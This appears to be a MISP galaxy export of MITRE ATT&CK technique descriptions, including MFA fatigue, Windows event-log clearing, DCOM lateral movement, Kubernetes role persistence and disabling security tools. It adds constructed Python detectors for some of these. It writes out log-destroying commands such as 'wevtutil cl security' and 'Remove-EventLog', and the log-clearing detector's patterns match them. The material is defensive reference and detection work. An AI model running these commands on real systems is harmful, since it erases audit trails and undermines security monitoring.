The tag is: misp-galaxy:mitre-attack-pattern="OS-vendor provided communication channels - T1390"

Table 5464. Table References

Links

https://attack.mitre.org/techniques/T1390

Multi-Factor Authentication Request Generation - T1621

Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Request Generation - T1621"

Table 5465. Table References

Links

https://attack.mitre.org/techniques/T1621

https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications

https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/

https://www.mandiant.com/resources/russian-targeting-gov-business
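A detection for the MFA-fatigue pattern described above, as an added example that is not part of the MISP galaxy or MITRE ATT&CK. It assumes a constructed log format (`timestamp user=<name> event=push_sent|push_approved|push_denied`); real MFA providers have their own schemas, so only the parser needs adapting.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real data). Line format assumed for this example:
#   <ISO-8601 UTC timestamp> user=<name> event=push_sent|push_approved|push_denied
# alice receives six pushes in about three minutes and finally approves; bob gets one push.
SAMPLE_LOG = """\
2024-03-01T02:11:05Z user=alice event=push_sent
2024-03-01T02:11:40Z user=alice event=push_denied
2024-03-01T02:12:02Z user=alice event=push_sent
2024-03-01T02:12:31Z user=alice event=push_sent
2024-03-01T02:13:04Z user=alice event=push_sent
2024-03-01T02:13:50Z user=alice event=push_sent
2024-03-01T02:14:12Z user=alice event=push_sent
2024-03-01T02:14:20Z user=alice event=push_approved
2024-03-01T09:00:00Z user=bob event=push_sent
2024-03-01T09:00:09Z user=bob event=push_approved
"""


def parse_line(line):
    """Split one log line into (timestamp, user, event)."""
    ts_s, user_s, event_s = line.split()
    ts = datetime.strptime(ts_s, "%Y-%m-%dT%H:%M:%SZ")
    return ts, user_s.split("=", 1)[1], event_s.split("=", 1)[1]


def find_push_bursts(log_text, threshold=5, window=timedelta(minutes=10)):
    """Return one alert per user who received at least `threshold` pushes inside a
    sliding `window`. The alert records how many pushes the burst reached and whether
    the user approved a push afterwards (the outcome an MFA-fatigue attack aims for)."""
    recent = defaultdict(deque)   # user -> timestamps of push_sent within the window
    alerts = {}                   # user -> alert dict
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, event = parse_line(line)
        if event == "push_sent":
            q = recent[user]
            q.append(ts)
            while ts - q[0] > window:      # drop pushes older than the window
                q.popleft()
            if len(q) >= threshold:
                alert = alerts.setdefault(user, {"user": user, "count": 0, "start": q[0],
                                                 "end": ts, "approved_after_burst": False})
                alert["count"] = max(alert["count"], len(q))
                alert["end"] = ts
        elif event == "push_approved" and user in alerts:
            # An approval after a burst is the case to escalate: the push was likely
            # accepted out of fatigue rather than for a login the user initiated.
            alerts[user]["approved_after_burst"] = True
    return list(alerts.values())
```

An approval that follows a burst is the case to treat as a probable account compromise; a burst that ends in denials still indicates the credentials are in the wrong hands.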

Rogue Wi-Fi Access Points - T1465

An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465"

Table 5466. Table References

Links

http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf

https://attack.mitre.org/techniques/T1465

https://blog.kaspersky.com/darkhotel-apt/6613/

https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html

Clear Windows Event Logs - T1070.001

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer’s alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

  • <code>wevtutil cl system</code>

  • <code>wevtutil cl application</code>

  • <code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001"

Table 5467. Table References

Links

https://attack.mitre.org/techniques/T1070/001

https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog

https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil

https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx

https://ptylu.github.io/content/report/report.html?report=25
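Detection logic for the log-clearing commands named in this entry, as an added example (not MISP or MITRE code). It runs over constructed, simplified Windows event records: Security 1102 ("audit log was cleared"), System 104 ("log file was cleared") and 4688 process creation with the command line, which requires command-line auditing to be enabled.

```python
import re

# Constructed sample events (simplified from Windows event XML; not real telemetry).
# 4688 = process creation, 1102 = Security audit log cleared,
# 104 = a log file was cleared (Microsoft-Windows-Eventlog, System channel).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Channel": "Security", "EventID": 4624,
     "Data": {"TargetUserName": "alice"}},
    {"Computer": "WS01", "Channel": "Security", "EventID": 4688,
     "Data": {"SubjectUserName": "alice", "CommandLine": "wevtutil  cl  Security"}},
    {"Computer": "WS01", "Channel": "Security", "EventID": 1102,
     "Data": {"SubjectUserName": "alice"}},
    {"Computer": "WS01", "Channel": "System", "EventID": 104,
     "Data": {"SubjectUserName": "alice", "Channel": "Application"}},
    {"Computer": "WS02", "Channel": "Security", "EventID": 4688,
     "Data": {"SubjectUserName": "bob",
              "CommandLine": "powershell.exe -c Remove-EventLog -LogName Security"}},
    {"Computer": "WS02", "Channel": "Security", "EventID": 4688,
     "Data": {"SubjectUserName": "bob", "CommandLine": "wevtutil qe Security /c:5"}},
]

# `wevtutil cl` (long form `clear-log`) and the Clear-/Remove-EventLog cmdlets.
CLEAR_CMD = re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(\S+)", re.IGNORECASE)
CLEAR_CMDLET = re.compile(r"\b(?:Clear|Remove)-EventLog\b.*?-LogName\s+(\S+)", re.IGNORECASE)


def detect_log_clearing(events):
    """Return findings for log-clear evidence: the clearing events themselves and
    process-creation records whose command line clears or removes a log."""
    findings = []
    for ev in events:
        data = ev.get("Data", {})
        who = data.get("SubjectUserName")
        if ev["Channel"] == "Security" and ev["EventID"] == 1102:
            findings.append({"host": ev["Computer"], "kind": "security_log_cleared",
                             "log": "Security", "user": who})
        elif ev["Channel"] == "System" and ev["EventID"] == 104:
            # Event 104 names the cleared channel in its own data, not in the envelope.
            findings.append({"host": ev["Computer"], "kind": "log_cleared",
                             "log": data.get("Channel", "?"), "user": who})
        elif ev["EventID"] == 4688:
            cmd = data.get("CommandLine", "")
            m = CLEAR_CMD.search(cmd) or CLEAR_CMDLET.search(cmd)
            if m:   # a query such as `wevtutil qe` does not match
                findings.append({"host": ev["Computer"], "kind": "clear_command",
                                 "log": m.group(1), "user": who})
    return findings
```

Because the clearing event is written after the clear, forwarding logs to a collector as they are generated is what keeps the 1102/104 records and the command lines available for this check.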

Network Share Connection Removal - T1070.005

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005"

Table 5468. Table References

Links

https://attack.mitre.org/techniques/T1070/005

https://technet.microsoft.com/bb490717.aspx

Distributed Component Object Model - T1021.003

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)

Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)

The tag is: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003"

Table 5469. Table References

Links

https://attack.mitre.org/techniques/T1021/003

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

https://msdn.microsoft.com/en-us/library/aa394582.aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Direct Cloud VM Connections - T1021.008

Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS Systems Manager.(Citation: AWS System Manager)

Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access.

Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console) These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).

The tag is: misp-galaxy:mitre-attack-pattern="Direct Cloud VM Connections - T1021.008"

Table 5470. Table References

Links

https://attack.mitre.org/techniques/T1021/008

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html

https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html

https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial

Remote Device Management Services - T1430.001

An adversary may use access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Device Management Services - T1430.001"

Table 5471. Table References

Links

https://attack.mitre.org/techniques/T1430/001

https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

Network Device Configuration Dump - T1602.002

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or to identify legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

The tag is: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002"

Table 5472. Table References

Links

https://attack.mitre.org/techniques/T1602/002

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

https://www.us-cert.gov/ncas/alerts/TA18-086A

Indicator Removal from Tools - T1027.005

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005"

Table 5473. Table References

Links

https://attack.mitre.org/techniques/T1027/005

Additional Email Delegate Permissions - T1098.002

Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

For example, the <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Additional Email Delegate Permissions - T1098.002"

Table 5474. Table References

Links

https://attack.mitre.org/techniques/T1098/002

https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps

https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html

https://support.google.com/a/answer/7223765?hl=en

https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/

https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365

Masquerade Task or Service - T1036.004

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"

Table 5475. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1036/004

https://technet.microsoft.com/en-us/library/bb490996.aspx

https://vms.drweb.com/virus/?i=4276269

https://www.freedesktop.org/software/systemd/man/systemd.service.html

Archive via Custom Method - T1560.003

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003"

Table 5476. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/techniques/T1560/003

Additional Container Cluster Roles - T1098.006

An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised.

Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).

The tag is: misp-galaxy:mitre-attack-pattern="Additional Container Cluster Roles - T1098.006"

Table 5477. Table References

Links

https://attack.mitre.org/techniques/T1098/006

https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters

https://cloud.google.com/kubernetes-engine/docs/how-to/iam

https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html

https://kubernetes.io/docs/concepts/security/rbac-good-practices/

https://kubernetes.io/docs/reference/access-authn-authz/abac/

https://learn.microsoft.com/en-us/azure/aks/concepts-identity
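An audit of RoleBindings and ClusterRoleBindings for the persistence pattern described above, as an added example (not MISP, MITRE or Kubernetes project code). It assumes a constructed, trimmed inventory of the kind `kubectl get clusterroles,roles,clusterrolebindings,rolebindings -A -o json` returns, and a baseline set of bindings already reviewed.

```python
# Constructed inventory, trimmed to the fields the check needs (not a real cluster).
CLUSTER_ROLES = {
    "cluster-admin": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}],
    "view": [{"apiGroups": [""], "resources": ["pods", "services"],
              "verbs": ["get", "list", "watch"]}],
    "secret-reader": [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}],
}
ROLES = {  # namespaced Roles keyed by (namespace, name)
    ("dev", "binding-editor"): [{"apiGroups": ["rbac.authorization.k8s.io"],
                                 "resources": ["rolebindings"], "verbs": ["create", "update"]}],
}
BINDINGS = [
    {"kind": "ClusterRoleBinding", "name": "cluster-admin",
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"kind": "ClusterRoleBinding", "name": "ci-runner-admin",
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "runner", "namespace": "ci"}]},
    {"kind": "RoleBinding", "namespace": "prod", "name": "read-secrets",
     "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "prod"}]},
    {"kind": "RoleBinding", "namespace": "dev", "name": "rb-edit",
     "roleRef": {"kind": "Role", "name": "binding-editor"},
     "subjects": [{"kind": "User", "name": "dana"}]},
    {"kind": "RoleBinding", "namespace": "dev", "name": "viewers",
     "roleRef": {"kind": "ClusterRole", "name": "view"},
     "subjects": [{"kind": "User", "name": "dana"}]},
]
# Bindings reviewed and accepted earlier, keyed (kind, namespace, name); any other
# binding that grants high privilege is reported as a possible added-role backdoor.
BASELINE = {("ClusterRoleBinding", None, "cluster-admin")}


def rule_risk(rule):
    """Classify one RBAC rule; None means nothing noteworthy."""
    verbs, res = set(rule.get("verbs", [])), set(rule.get("resources", []))
    if "*" in verbs and "*" in res:
        return "wildcard rule (cluster-admin equivalent)"
    if "secrets" in res and verbs & {"get", "list", "watch", "*"}:
        return "reads secrets"
    if res & {"rolebindings", "clusterrolebindings", "roles", "clusterroles"} \
            and verbs & {"create", "update", "patch", "*"}:
        return "can grant roles (further escalation path)"
    return None


def rules_for(binding, cluster_roles, roles):
    """Resolve a binding's roleRef; a RoleBinding may reference a ClusterRole."""
    ref = binding["roleRef"]
    if ref["kind"] == "ClusterRole":
        return cluster_roles.get(ref["name"], [])
    return roles.get((binding.get("namespace"), ref["name"]), [])


def risky_bindings(bindings, cluster_roles, roles, baseline):
    """Return bindings outside the baseline whose role carries at least one risk."""
    findings = []
    for b in bindings:
        key = (b["kind"], b.get("namespace"), b["name"])
        if key in baseline:
            continue
        risks = sorted({r for r in map(rule_risk, rules_for(b, cluster_roles, roles)) if r})
        if risks:
            subjects = []
            for s in b["subjects"]:
                ns = s.get("namespace")
                subjects.append(f'{s["kind"]}:{ns + "/" if ns else ""}{s["name"]}')
            findings.append({"binding": key, "subjects": subjects, "risks": risks})
    return findings
```

Diffing the output against the previous run, or feeding it Kubernetes audit-log `create` events for RBAC objects, turns the one-off check into continuous monitoring for this technique.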

Extra Window Memory Injection - T1055.011

Adversaries may inject malicious code into a process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.

Before creating a window, graphical Windows-based processes must register or subscribe to a window class, which stipulates appearance and behavior (via window procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of a new window class can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011"

Table 5478. Table References

Links

https://attack.mitre.org/techniques/T1055/011

https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx

https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

Create Process with Token - T1134.002

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)

Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.

While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.

The tag is: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002"

Table 5479. Table References

Links

https://attack.mitre.org/techniques/T1134/002

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Code Signing Policy Modification - T1632.001

Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device.

Mobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1632.001"

Table 5480. Table References

Links

https://attack.mitre.org/techniques/T1632/001

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html

System Runtime API Hijacking - T1625.001

Adversaries may execute their own malicious payloads by hijacking the way an operating system runs applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time.

On Android, adversaries may overwrite the standard OS API library with a malicious alternative to hook into core functions to achieve persistence. By doing this, the adversary’s code will be executed every time the overwritten API function is called by an app on the infected device.

The tag is: misp-galaxy:mitre-attack-pattern="System Runtime API Hijacking - T1625.001"

Table 5481. Table References

Links

https://attack.mitre.org/techniques/T1625/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

Disable or Modify Tools - T1562.001

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying or deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)

Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)

On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)

Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"

Table 5482. Table References

Links

https://attack.mitre.org/techniques/T1562/001

https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf

